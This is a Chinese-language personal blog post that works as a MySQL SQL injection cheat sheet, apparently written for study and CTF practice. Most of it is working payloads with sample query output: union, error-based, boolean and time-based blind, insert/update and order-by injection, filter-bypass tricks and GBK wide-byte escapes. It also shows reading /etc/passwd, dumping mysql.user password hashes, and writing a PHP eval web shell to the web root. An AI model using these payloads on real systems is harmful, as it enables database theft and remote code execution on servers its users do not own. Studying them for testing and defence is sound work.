<!DOCTYPE html>
<html lang="zh-CN">










<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="author" content="chuddy">
    <meta name="keywords" content="">
    <title>sql注入 ~ chuddy&#39;s Blog</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.7.2/css/all.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/mdb.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_vr10bjtg3us.css">
    
        <link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">
    
</head>

<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/"><strong>chuddy&#39;s Blog</strong></a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2" style='background: url("/post.jpg")no-repeat center center;background-size: cover;'>
    <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
        <div class="container text-center white-text wow fadeInUp">
            <p class="h2">sql注入</p>
            <br>
            
            <p>Thursday, May 2nd 2019, 4:31 pm</p>
            
        </div>
        </div>
    </div>
    </div>
  </header>

  <main>
  
  <div class="container-fluid">
    <div class="row">
        <div class="col-md-8 offset-md-2 ">
            <div class="post-content py-5 z-depth-3 main">
                <h1 id="sql注入漏洞"><a href="#sql注入漏洞" class="headerlink" title="sql注入漏洞"></a>sql注入漏洞</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>感觉自己以前学的比较粗糙，这一段打算逐一把学过的漏洞再重新学习一边，加深一下印象。</p>
<a id="more"></a>
<h2 id="sql注入简介"><a href="#sql注入简介" class="headerlink" title="sql注入简介"></a>sql注入简介</h2><p>Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击，它目前黑客对数据库进行攻击的最常用手段之一。</p>
<h2 id="mysql数据库的知识储备"><a href="#mysql数据库的知识储备" class="headerlink" title="mysql数据库的知识储备"></a>mysql数据库的知识储备</h2><pre><code>mysql数据库中的一些全局变量
user()  当前用户
version()  数据库版本
database()  当前数据库名
@@version_compile_os  当前的操作系统



数据库中常见的注释符：
1. -- 后面有一个空格
2. /*...*/
3. #

</code></pre><p>在MySQL中有一个叫做<code>information_schema</code>的库，它存储着所有表的信息</p>
<p>虽然里面有这么多的表，常用的不是特别多 <code>schemata</code>、<code>TABLES</code>、<code>COLUMNS</code></p>
<p><code>schemata</code>表，这个便存储了mysql数据库的所有库名</p>
<p><code>tables</code>表里面包含了数据库中的所有的表名</p>
<p><code>COLUMNS</code>表中存储了所有表的字段信息</p>
<p>一些常用的查找语句</p>
<pre><code>所有用户
select group_concat(user) from mysql.user
用户hash:
select group_concat(password) from mysql.user where user=&#39;root&#39;
所有数据库：
select group_concat(schema_name) from information_schema.schemata
表名：
select group_concat(table_name) from information_schema.tables where table_schema=&#39;库名&#39;
//表中有主码约束，非空约束等完整性约束条件的才能用这个语句查询出来
select group_concat(table_name) from information_schema.table_constraints where table_schema=&#39;库名&#39;
字段名：
select group_concat(column_name) from information_schema.columns where table_name=&#39;表名&#39;
读文件：
select load_file(&#39;/etc/passwd&#39;)
写文件：
select &lt;?php @eval($_POST[&#39;a&#39;]); ?&gt; into outfile &#39;/var/www/html/shell.php&#39;
</code></pre><h2 id="常见的sql注入类型"><a href="#常见的sql注入类型" class="headerlink" title="常见的sql注入类型"></a>常见的sql注入类型</h2><h3 id="union注入"><a href="#union注入" class="headerlink" title="union注入"></a>union注入</h3><p>联合注入也是常见一种注入方式，利用条件页面需要有回显位。</p>
<h4 id="猜字段的长度"><a href="#猜字段的长度" class="headerlink" title="猜字段的长度"></a>猜字段的长度</h4><p>页面有回显的情况下可以通过：<code>order by</code>  来猜测字段的长度</p>
<pre><code>id=1&#39; order by 3-- 
</code></pre><h4 id="猜字段的位置"><a href="#猜字段的位置" class="headerlink" title="猜字段的位置"></a>猜字段的位置</h4><p>如果已经知道字段的长度为3的话可以通过联合查询来爆出字段的位置</p>
<pre><code>id=-1&#39; union select 1,2,3-- 
</code></pre><h4 id="基本语法"><a href="#基本语法" class="headerlink" title="基本语法"></a>基本语法</h4><pre><code>union select 1,flag,3 from flag
</code></pre><h4 id="过滤了逗号的联合注入"><a href="#过滤了逗号的联合注入" class="headerlink" title="过滤了逗号的联合注入"></a>过滤了逗号的联合注入</h4><pre><code>mysql&gt; select * from user1 where id=-1 union select * from (select version())a join (select database())b join (select database())c;
+--------+------+------+
| id     | name | pass |
+--------+------+------+
| 5.5.53 | test | test |
+--------+------+------+
1 row in set (0.04 sec)
</code></pre><h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>mysql数据库的报错注入方法整理，</p>
<ul>
<li>floor</li>
<li>UpdateXml</li>
<li>ExtractValue</li>
<li>NAME_CONST</li>
<li>Error based Double Query Injection</li>
<li>…</li>
</ul>
<h4 id="floor"><a href="#floor" class="headerlink" title="floor"></a>floor</h4><pre><code>?id=1 OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x6368756464797e,(SELECT user()),0x7e636875646479,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)


操作：
mysql&gt; select * from user where id=1 OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x6368756464797e,(SELECT user()),0x7e636875646479,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a);
ERROR 1062 (23000): Duplicate entry &#39;chuddy~root@localhost~chuddy1&#39; for key &#39;group_key&#39;
</code></pre><h4 id="ExtractValue-有长度限制-最长32位"><a href="#ExtractValue-有长度限制-最长32位" class="headerlink" title="ExtractValue(有长度限制,最长32位)"></a>ExtractValue(有长度限制,最长32位)</h4><pre><code>?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))


mysql&gt; select * from user where 1 and extractvalue(1, concat(0x7e, (select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: &#39;~5.5.53~&#39;
</code></pre><p>当查询的书库超过32位 可以利用字符串截取函数，多次读取该数据</p>
<h4 id="UpdateXml-有长度限制-最长32位"><a href="#UpdateXml-有长度限制-最长32位" class="headerlink" title="UpdateXml(有长度限制,最长32位)"></a>UpdateXml(有长度限制,最长32位)</h4><pre><code>?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
</code></pre><p>利用方式和<code>ExtractValue</code>方式差不多，当查询的书库超过32位 可以利用字符串截取函数，多次读取该数据</p>
<h4 id="NAME-CONST-适用于低版本，不太好用"><a href="#NAME-CONST-适用于低版本，不太好用" class="headerlink" title="NAME_CONST(适用于低版本，不太好用)"></a>NAME_CONST(适用于低版本，不太好用)</h4><pre><code>?id=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
</code></pre><h4 id="Error-based-Double-Query-Injection"><a href="#Error-based-Double-Query-Injection" class="headerlink" title="Error based Double Query Injection"></a>Error based Double Query Injection</h4><pre><code>?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
</code></pre><h4 id="exp-5-5-5以上"><a href="#exp-5-5-5以上" class="headerlink" title="exp(5.5.5以上)"></a>exp(5.5.5以上)</h4><pre><code>?id=1 and (select exp(~(select * from(select user())x)))
</code></pre><h4 id="polygon"><a href="#polygon" class="headerlink" title="polygon"></a>polygon</h4><pre><code>mysql&gt; select * from user where name = &quot;&quot; and polygon(pass);
ERROR 1367 (22007): Illegal non geometric &#39;`test`.`user`.`pass`&#39; value found during parsing
</code></pre><h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>基本语法</p>
<pre><code>id = 1 and ascii(substr((select database()),1,1))&gt;97--+
</code></pre><p>由于Mysql4之后对大小写就不敏感，可以使用binary()函数使大小写敏感。</p>
<h4 id="构造布尔条件的骚姿势"><a href="#构造布尔条件的骚姿势" class="headerlink" title="构造布尔条件的骚姿势"></a>构造布尔条件的骚姿势</h4><pre><code>//正常情况
&#39;or bool#
true&#39;and bool#

//不使用空格、注释
&#39;or(bool)=&#39;1
true&#39;and(bool)=&#39;1

//不使用or、and、注释
&#39;^!(bool)=&#39;1
&#39;=(bool)=&#39;
&#39;||(bool)=&#39;1
true&#39;%26%26(bool)=&#39;1  //%26就是&amp;
&#39;=if((bool),1,0)=&#39;0
&#39;-(bool)-&#39;
&#39;^(bool)^&#39;

//不使用等号、空格、注释
&#39;or(bool)&lt;&gt;&#39;0
&#39;or((bool)in(1))or&#39;0

//其他
or (case when (bool) then 1 else 0 end)
</code></pre><h4 id="构造逻辑判断"><a href="#构造逻辑判断" class="headerlink" title="构造逻辑判断"></a>构造逻辑判断</h4><p>常见的逻辑判断函数</p>
<pre><code>
字符串的截取函数：
left(user(),1)&gt;&#39;c&#39;
right(user(),1)&gt;&#39;c&#39;
substr(user(),1,1)&gt;&#39;c&#39;
mid(user(),1,1)=&#39;c&#39;

查询字符串的长度:
length(&#39;chuddy&#39;)  

查询字符的ascii码：
ord(&#39;a&#39;)
ascii(&#39;a&#39;)

ascii转换字符:
char(97)

布尔盲注的基本语法：
ascii(substr((查询的sql语句),1,1))&gt;97
</code></pre><p>一些绕过方式</p>
<pre><code>过滤了空格可以一下代替
/*1*/
%20
%a0

过滤了 = 
like
&lt;&gt;
regexp 

过滤了一些关键词
可以大小写绕过
unIon、seLect、

如果关键词被替换位空白  可以双写绕过
selselectect、 uniunionon

</code></pre><p>特殊的盲注方法:</p>
<p>利用order by 盲注</p>
<pre><code>----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql&gt; select * from admin where username=&#39;&#39; or 1 union select 1,2,&#39;6&#39; order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)
</code></pre><p>过滤很严格的话 可以通过一些其他它方式爆破密码</p>
<pre><code>mysql&gt; select * from user1 where name=&quot;user4&quot;  &amp;&amp;   pass&gt;&#39;a1&#39;;
+------+-------+--------+
| id   | name  | pass   |
+------+-------+--------+
|    4 | user4 | a1b2c3 |
+------+-------+--------+
1 row in set (0.00 sec)

mysql&gt; select * from user1 where name=&quot;user4&quot;  &amp;&amp;   pass&gt;&#39;a2&#39;;
Empty set (0.00 sec)
</code></pre><p>跨表查询数据</p>
<pre><code>mysql&gt; select * from user1 where id =1 and (select a.pass&lt;&#39;7&#39; from user a limit 1);
+------+-------+------+
| id   | name  | pass |
+------+-------+------+
|    1 | user1 | 123  |
+------+-------+------+
1 row in set (0.00 sec)

mysql&gt; select * from user1 where id =1 and (select a.pass&gt;&#39;7&#39; from user a limit 1);
Empty set (0.00 sec)

</code></pre><h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h3><p>相交于bool盲注，就是把返回值0和1改为是否延时的标准，一般格式为：<code>if((bool),sleep(5),0)</code>和<code>or (case when (bool) then sleep(5) else 0 end)</code></p>
<p>延时函数：</p>
<pre><code>BENCHMARK(100000,MD5(1))

sleep
</code></pre><p>BENCHMARK()用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的cpu资源。推荐使用sleep()</p>
<p>如果着两个函数被ban了可以利用笛卡儿积造成延迟来进行注入</p>
<pre><code>&#39; and if(ascii(substr((select database()),%d,1))&lt;%d,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B,information_schema.tables C),1)#
</code></pre><h3 id="insert和uodate注入"><a href="#insert和uodate注入" class="headerlink" title="insert和uodate注入"></a>insert和uodate注入</h3><pre><code>//insert 的报错注入
mysql&gt; insert into user2 values(null,&#39;a&#39; and extractvalue(1, concat(0x7e, (select @@version),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: &#39;~5.5.53~&#39;
mysql&gt; insert into user2 values(null,&#39;a&#39; and extractvalue(1, concat(0x7e, (select database()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: &#39;~y1~&#39;

//update的报错注入
mysql&gt; update user2 set name=&#39;a&#39; where pass=&#39;a&#39; and extractvalue(1, concat(0x7e, (select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: &#39;~5.5.53~&#39;
mysql&gt; update user2 set name=&#39;a&#39; where pass=&#39;a&#39; and extractvalue(1, concat(0x7e, (select database()),0x7e));
ERROR 1105 (HY000): XPATH syntax error: &#39;~y1~&#39;

//insert 延时注入 database为y1
mysql&gt; insert into user2(name,pass) values(&#39;a&#39;, mid((select database()),1,1)=&quot;1&quot; or sleep(3));
Query OK, 1 row affected (3.00 sec)

mysql&gt; insert into user2(name,pass) values(&#39;a&#39;, mid((select database()),1,1)=&quot;y&quot; or sleep(3));
Query OK, 1 row affected (0.00 sec)

</code></pre><p>如果存在insert或者update,更新后的数据是可见的话,那么利用mysql中字符串在与数字进行运算的时候当作是0进行运算</p>
<pre><code>mysql&gt; select &#39;&#39;+1;
+------+
| &#39;&#39;+1 |
+------+
|    1 |
+------+
1 row in set (0.00 sec)
</code></pre><p>那么我们可以利用查询的数据转化为10进制,然后进行运算,拿到我们计算的结果,在进行转化回去即可</p>
<p>insert into 情况下：</p>
<pre><code>mysql&gt; insert into user(id,name,pass) values(&#39;7&#39;,&#39;chuddy&#39;,&#39;&#39;+conv(hex(substr(database(),1 + (1-1) * 6,6)),16,10));
Query OK, 1 row affected (0.00 sec)

mysql&gt; select * from user where id=7;
+------+--------+------------+
| id   | name   | pass       |
+------+--------+------------+
|    7 | chuddy | 1952805748 |
+------+--------+------------+
1 row in set (0.00 sec)

mysql&gt; select unhex(conv(1952805748,10,16));
+-------------------------------+
| unhex(conv(1952805748,10,16)) |
+-------------------------------+
| test                          |
+-------------------------------+
1 row in set (0.00 sec)
</code></pre><p>update 情况下：</p>
<pre><code>mysql&gt; update user set pass=&#39;&#39;+conv(hex(substr(user(),1 + (1-1) * 6,6)),16,10) where id=3;
Query OK, 1 row affected (0.11 sec)
Rows matched: 1  Changed: 1  Warnings: 0

mysql&gt; select * from user where id =3;
+------+-------------+-----------------+
| id   | name        | pass            |
+------+-------------+-----------------+
|    3 | ccccccccccc | 125822936825964 |
+------+-------------+-----------------+
1 row in set (0.04 sec)

mysql&gt; select unhex(conv(125822936825964,10,16));
+------------------------------------+
| unhex(conv(125822936825964,10,16)) |
+------------------------------------+
| root@l                             |
+------------------------------------+
1 row in set (0.00 sec)
</code></pre><h3 id="order-by-注入"><a href="#order-by-注入" class="headerlink" title="order by 注入"></a>order by 注入</h3><h4 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="报错注入"></a>报错注入</h4><p>常见的利用方式：</p>
<p><code>order by 1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))</code></p>
<pre><code>mysql&gt; select * from user order by 1 and extractvalue(1, concat(0x7e, (select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: &#39;~5.5.53~&#39;
mysql&gt; select * from user order by 1 and extractvalue(1, concat(0x7e, (select database()),0x7e));
ERROR 1105 (HY000): XPATH syntax error: &#39;~test~&#39;
</code></pre><h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h4><p>盲注的基本操作\<br><code>order by IF((bool),1,(select 1 union select 2))</code></p>
<pre><code>mysql&gt; select * from user order by if((substr(database(),1,1)&lt;&#39;a&#39;),1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql&gt; select * from user order by if((substr(database(),1,1)&gt;&#39;a&#39;),1,(select 1 union select 2));
+------+---------------+-----------------------+
| id   | name          | pass                  |
+------+---------------+-----------------------+
|    1 | aaaaaaaaaa    | 123                   |
|    2 | bbbbbbbbbbbbb | 456                   |
|    3 | ccccccccccc   | 3.2210671827446896e16 |
|    4 | dddddddddddd  | 258                   |
|    5 | eeeeeeeee     | 159                   |
| NULL |               | NULL                  |
|    6 | cccc          | 58                    |
|    7 | chuddy        | 1952805748            |
+------+---------------+-----------------------+
8 rows in set (0.02 sec)
</code></pre><h4 id="延时注入-1"><a href="#延时注入-1" class="headerlink" title="延时注入"></a>延时注入</h4><p>不推荐，因为每条数据都会执行延时，能用其他方法就不使用延时。\<br><code>order by IF(1,sleep(3),0)</code>;</p>
<p>两条数据就会延时了6秒</p>
<h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><p>原理：在<code>GBK</code>编码时，<code>mysql</code>会认为两个字符是一个汉字（在前一个字节的ascii码大于128的情况下）。而经过转义之后的单引号<code>&#39;</code>会变为<code>\&#39;</code>，即<code>%5c%27</code>。构造<code>id=1%df%27%23</code>，在经过转义传递给<code>mysql</code>时，就是<code>id=1%df%5c%27%23</code>，mysql在解析时，会认为<code>%df%5c</code>是一个汉字，而<code>%27</code>就会闭合掉原本sql语句中的（左）单引号，即<code>select xxx from xxx where id=&#39;%df%5c&#39;#&#39;</code>，<code>%23</code>用于注释掉原本sql语句中的（右）单引号。这就是宽字节注入的原理。</p>
<p>注入方式和正常的注入差不多的： <code>%df%27%20union%20select%201,database()--+</code></p>

                <hr>
                <div>
                    <p>
                         
                        <span class="badge badge-light">#&nbsp;web漏洞</span>
                        &nbsp;
                        
                    </p>
                </div>
                <br>
                
            </div>
        </div>
        <div class="d-none d-md-block col-md-2">
            
  <div id="toc" class="py-5">
    <p class="h6"><i class="iconfont icon-toc" style="vertical-align:middle"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>        
</div>

<br><br><br>

<!-- Comments -->
<div class="comments" id="comments">
 
</div>
  
  </main>

<footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank"><b>HEXO</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/jquery-3.3.1.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/bootstrap.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/mdb.min.js"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    
    <script src="/js/post.js"></script>
    
      <script src="/js/plugins/prettify.js"></script>
      <script>
          $(document).ready(function(){
              $('pre').addClass('prettyprint linenums');
              prettyPrint();
          })
      </script>
    
  
</body>
</html>